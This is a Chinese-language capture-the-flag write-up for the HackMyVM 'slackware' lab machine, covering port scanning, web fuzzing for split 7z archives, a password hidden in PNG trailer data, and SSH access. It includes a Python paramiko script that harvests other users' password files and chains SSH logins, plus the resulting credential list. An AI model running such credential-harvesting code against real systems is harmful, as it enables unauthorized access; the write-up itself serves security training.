HackMyVM-slackware

本文最后更新于 2024年11月12日 晚上

cx 师傅今天太高产嘞,自愧不如呜呜呜(

探寻存活主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# nmap -Pn -n 192.168.56.0/24                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 01:10 EST
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2179/tcp open  vmrdp
MAC Address: 0A:00:27:00:00:08 (Unknown)

Nmap scan report for 192.168.56.2
Host is up (0.00040s latency).
All 1000 scanned ports on 192.168.56.2 are in ignored states.
Not shown: 1000 filtered tcp ports (proto-unreach)
MAC Address: 08:00:27:34:14:9C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.16
Host is up (0.00091s latency).
Not shown: 999 closed tcp ports (reset)
PORT  STATE SERVICE
1/tcp open  tcpmux
MAC Address: 08:00:27:18:04:1D (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.4
Host is up (0.0000070s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds

锁定主机:192.168.56.16

探寻目标主机服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# nmap -Pn -n -sV -sC 192.168.56.16 -p-                                                                                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 01:10 EST
Nmap scan report for 192.168.56.16
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT  STATE SERVICE VERSION
1/tcp open  ssh     OpenSSH 9.3 (protocol 2.0)
| ssh-hostkey: 
|   256 e2:66:60:79:bc:d1:33:2e:c1:25:fa:99:e5:89:1e:d3 (ECDSA)
|_  256 98:59:c3:a8:2b:89:56:77:eb:72:4a:05:90:21:cb:40 (ED25519)
2/tcp open  http    Apache httpd 2.4.58 ((Unix))
|_http-title: Tribute to Slackware
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.58 (Unix)
MAC Address: 08:00:27:18:04:1D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.39 seconds

这次有点神奇哈哈哈,1端口为ssh,2端口为http

对目标主机服务进行信息收集

2-http

这个能够在谷歌搜到:salckware,在Security Advisories中最下面存在ssh key的泄露。

下载到kali中

1
2
3
4
5
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# curl https://www.slackware.com/infra/keys/GPG-KEY > key
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1572  100  1572    0     0    700      0  0:00:02  0:00:02 --:--:--   700

留着备用,接下来继续信息收集。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# gobuster dir -u http://192.168.56.16:2 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.16:2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,bak,jpg,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 7511]
/background.jpg       (Status: 200) [Size: 13798]
/robots.txt           (Status: 200) [Size: 21]
/.html                (Status: 403) [Size: 199]
/getslack             (Status: 301) [Size: 240] [--> http://192.168.56.16:2/getslack/]

发现一个robots.txt。访问查看

存在一个7z.001?

这是一个7z压缩文件的一个分卷,也就是说还有很多这样的分卷,且只是.00?不同

但是我得先找到这个分卷怎么下载。

去/getslack看看

提示在这里搜索????

(在此之前我进行了对扫出的图片进行信息查看,继续扫描关于7z的信息与/getslack目录下的文件这些都可以在未来提供一些有用的信息,只是这个靶机不需要,希望大家多多尝试。)
这是什么意思(这里我通过翻阅,发现一些压缩包分卷都会有一个前缀开头,所以我打算fuzz)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# wfuzz -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.16:2/getslack/FUZZ.7z.001 --sc 200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.16:2/getslack/FUZZ.7z.001
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                 
=====================================================================

000000001:   200        1 L      2 W        12 Ch       "# directory-list-lowercase-2.3-medium.txt"                                                                                             
000000007:   200        1 L      2 W        12 Ch       "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                       
000000003:   200        1 L      2 W        12 Ch       "# Copyright 2007 James Fisher"                                                                                                         
000000012:   200        1 L      2 W        12 Ch       "# on atleast 2 different hosts"                                                                                                        
000000009:   200        1 L      2 W        12 Ch       "# Suite 300, San Francisco, California, 94105, USA."                                                                                   
000000010:   200        1 L      2 W        12 Ch       "#"                                                                                                                                     
000000011:   200        1 L      2 W        12 Ch       "# Priority ordered case insensative list, where entries were found"                                                                    
000000013:   200        1 L      2 W        12 Ch       "#"                                                                                                                                     
000000006:   200        1 L      2 W        12 Ch       "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                         
000000008:   200        1 L      2 W        12 Ch       "# or send a letter to Creative Commons, 171 Second Street,"                                                                            
000000005:   200        1 L      2 W        12 Ch       "# This work is licensed under the Creative Commons"                                                                                    
000000002:   200        1 L      2 W        12 Ch       "#"                                                                                                                                     
000000004:   200        1 L      2 W        12 Ch       "#"                                                                                                                                     
000049387:   200        80 L     794 W      19474 Ch    "twitter"

fuzz出来前缀是twitter。下载到本地看看。

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# wget http://192.168.56.16:2/getslack/twitter.7z.001                                                                                    
--2024-11-12 01:28:00--  http://192.168.56.16:2/getslack/twitter.7z.001
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.001’

twitter.7z.001                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:28:00 (26.9 MB/s) - ‘twitter.7z.001’ saved [20480/20480]

我们刚才说了,这只是7z的一个分卷,那么肯定还有很多。使用循环命令进行下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# for i in $(seq 1 20); do wget http://192.168.56.16:2/getslack/twitter.7z.0$i; done 
--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.01
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.02
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.03
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.04
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.05
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.06
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.07
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.08
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.09
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.010
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.010’

twitter.7z.010                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:31 (16.1 MB/s) - ‘twitter.7z.010’ saved [20480/20480]

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.011
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.011’

twitter.7z.011                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:31 (18.0 MB/s) - ‘twitter.7z.011’ saved [20480/20480]

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.012
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.012’

twitter.7z.012                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0s      

2024-11-12 01:29:31 (54.4 MB/s) - ‘twitter.7z.012’ saved [20480/20480]

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.013
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.013’

twitter.7z.013                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.003s  

2024-11-12 01:29:31 (7.05 MB/s) - ‘twitter.7z.013’ saved [20480/20480]

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.014
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1860 (1.8K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.014’

twitter.7z.014                                     100%[=============================================================================================================>]   1.82K  --.-KB/s    in 0s      

2024-11-12 01:29:31 (89.5 MB/s) - ‘twitter.7z.014’ saved [1860/1860]

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.015
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.016
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.017
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.018
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.019
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31--  http://192.168.56.16:2/getslack/twitter.7z.020
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

                                                                                                                                                                                                         
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# for i in $(seq 1 20); do wget http://192.168.56.16:2/getslack/twitter.7z.00$i; done
--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.001
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.001.1’

twitter.7z.001.1                                   100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.002s  

2024-11-12 01:29:35 (10.3 MB/s) - ‘twitter.7z.001.1’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.002
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.002’

twitter.7z.002                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.002s  

2024-11-12 01:29:35 (11.5 MB/s) - ‘twitter.7z.002’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.003
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.003’

twitter.7z.003                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:35 (13.1 MB/s) - ‘twitter.7z.003’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.004
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.004’

twitter.7z.004                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0s      

2024-11-12 01:29:35 (400 MB/s) - ‘twitter.7z.004’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.005
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.005’

twitter.7z.005                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:35 (16.1 MB/s) - ‘twitter.7z.005’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.006
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.006’

twitter.7z.006                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:35 (17.3 MB/s) - ‘twitter.7z.006’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.007
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.007’

twitter.7z.007                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:35 (17.3 MB/s) - ‘twitter.7z.007’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.008
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.008’

twitter.7z.008                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0.001s  

2024-11-12 01:29:35 (20.4 MB/s) - ‘twitter.7z.008’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.009
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.009’

twitter.7z.009                                     100%[=============================================================================================================>]  20.00K  --.-KB/s    in 0s      

2024-11-12 01:29:35 (87.7 MB/s) - ‘twitter.7z.009’ saved [20480/20480]

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0010
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0011
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0012
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0013
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0014
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0015
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0016
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0017
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0018
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0019
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35--  http://192.168.56.16:2/getslack/twitter.7z.0020
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

已经全部下载下来了,接下来进行解压。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# 7z x twitter.7z.001

7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
 64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 20480 bytes (20 KiB)

Extracting archive: twitter.7z.001
--         
Path = twitter.7z.001
Type = Split
Physical Size = 20480
Volumes = 14
Total Physical Size = 268100
----
Path = twitter.7z
Size = 268100
--
Path = twitter.7z
Type = 7z
Physical Size = 268100
Headers Size = 130
Method = LZMA2:384k
Solid = -
Blocks = 1

Everything is Ok

Size:       267951
Compressed: 268100

x 选项可自动提取分卷文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# exiftool twitter.png
ExifTool Version Number         : 12.76
File Name                       : twitter.png
Directory                       : .
File Size                       : 268 kB
File Modification Date/Time     : 2024:03:10 16:42:47-04:00
File Access Date/Time           : 2024:11:12 01:30:12-05:00
File Inode Change Date/Time     : 2024:11:12 01:30:12-05:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 400
Image Height                    : 400
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Profile Name                    : icc
Profile CMM Type                : Little CMS
Profile Version                 : 4.4.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2022:12:19 06:28:40
Profile File Signature          : acsp
Primary Platform                : Apple Computer Inc.
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : 
Device Model                    : 
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Little CMS
Profile ID                      : 0
Profile Description             : GIMP built-in sRGB
Profile Copyright               : Public Domain
Media White Point               : 0.9642 1 0.82491
Chromatic Adaptation            : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168
Red Matrix Column               : 0.43604 0.22249 0.01392
Blue Matrix Column              : 0.14305 0.06061 0.71393
Green Matrix Column             : 0.38512 0.7169 0.09706
Red Tone Reproduction Curve     : (Binary data 32 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 32 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 32 bytes, use -b option to extract)
Chromaticity Channels           : 3
Chromaticity Colorant           : Unknown
Chromaticity Channel 1          : 0.64 0.33002
Chromaticity Channel 2          : 0.3 0.60001
Chromaticity Channel 3          : 0.15001 0.06
Device Mfg Desc                 : GIMP
Device Model Desc               : sRGB
White Point X                   : 0.3127
White Point Y                   : 0.329
Red X                           : 0.64
Red Y                           : 0.33
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.06
Warning                         : [minor] Trailer data after PNG IEND chunk
Image Size                      : 400x400
Megapixels                      : 0.160

使用exiftool查看图片信息并无任何有用的信息。
查看下二进制内容

疑似为密码。这里其实就是无界面化终端的软肋了qwq。我们去kali里看看这个图片的样子。

这里就是社工了。。直接谷歌识图

获取到一个推特名,尝试是否能够登录

Patrick Volkerding

发现全名无法登录,所以我尝试取用前面的发现可以登录。密码即为图片二进制内容中:trYth1sPasS1993

这里其实就是一个究极无敌的套娃。因为同组用户可以获取对方的密码(密码在用户目录下mypass.txt),但是有的组中的某个用户又分别在其他组。所以需要获取同组的另外一个用户密码然后切换然后再获取,直到发现user_flag

我是手动的,大概切换了十几个到二十几个 我忘了。user_flag在rpj7中。这里我借用一下大佬的脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2024/9/11 12:49
# @Author  : hgbe02
# @File    : slakeware_brute.py
 
import paramiko
 
usernames = []
passwords = []
 
def ssh_login_with_password(host, port, username, password):
    # 创建一个新的 SSH 客户端对象
    client = paramiko.SSHClient()
    # 自动添加策略,用于保存服务器的主机名和密钥信息(自动保存)
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
    try:
        # 连接 SSH 服务端,这里使用了密码方式进行认证
        client.connect(host, port=port, username=username, password=password)
 
        # 执行命令获取用户名
        stdin, stdout, stderr = client.exec_command(
            "find ../ -name *pass* -type f 2>/dev/null | awk -F '[/]' '{print $2}'"
        )
        output = stdout.read().decode().splitlines()
        # print("[+] Username\n", output)
        global usernames
        for line in output:
            stripped_line = line.strip()
            if stripped_line not in usernames:
                usernames.append(stripped_line)
 
        # 执行命令获取密码
        stdin, stdout, stderr = client.exec_command(
            "find ../ -name '*pass*' -type f 2>/dev/null | xargs cat"
        )
        output = stdout.read().decode().splitlines()
        # print("[+] Password\n", output)
        global passwords
        for line in output:
            stripped_line = line.strip()
            if stripped_line not in passwords:
                passwords.append(stripped_line)
 
    except paramiko.AuthenticationException:
        print("Authentication failed, please verify your credentials.")
    except paramiko.SSHException as sshException:
        print("Unable to establish SSH connection: " + str(sshException))
    except Exception as e:
        print("Exception in connecting to the server: " + str(e))
    finally:
        # 关闭连接
        client.close()
 
ssh_login_with_password('192.168.10.100', 1, 'patrick', 'trYth1sPasS1993')
 
a = 0
while a < len(usernames):
    ssh_login_with_password('192.168.10.100', 1, usernames[a], passwords[a])
    a += 1
 
print('[+] username and password ! (✪ω✪)')
print(usernames)
print(passwords)
 
# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee',
# 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft',
# 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer',
# 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos',
# 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
#
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt',
# 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc',
# '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t',
# 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg',
# '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj',
# 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh',
# 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw',
# 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']
 
def execute_command(host, port, username, password, command):
    # 创建 SSH 客户端
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
    try:
        # 连接到SSH服务器
        client.connect(host, port=port, username=username, password=password)
 
        # 执行命令
        stdin, stdout, stderr = client.exec_command(command)
 
        # 获取命令结果
        output = stdout.read().decode('utf-8').strip()
        error = stderr.read().decode('utf-8').strip()
 
        if output:
            print(f"[+] USER:{username} PASS:{password} => {output}")
 
    except Exception as e:
        print(f"An error occurred: {str(e)}")
    finally:
        # 关闭连接
        client.close()
 
print("[+] Search user flag (っ^_^)っ")
for i in range(0, len(usernames)):
    execute_command('192.168.10.100', 1, usernames[i], passwords[i], "grep -Pnir 'hmv' ./")
 
# [+] username and password ! (✪ω✪)
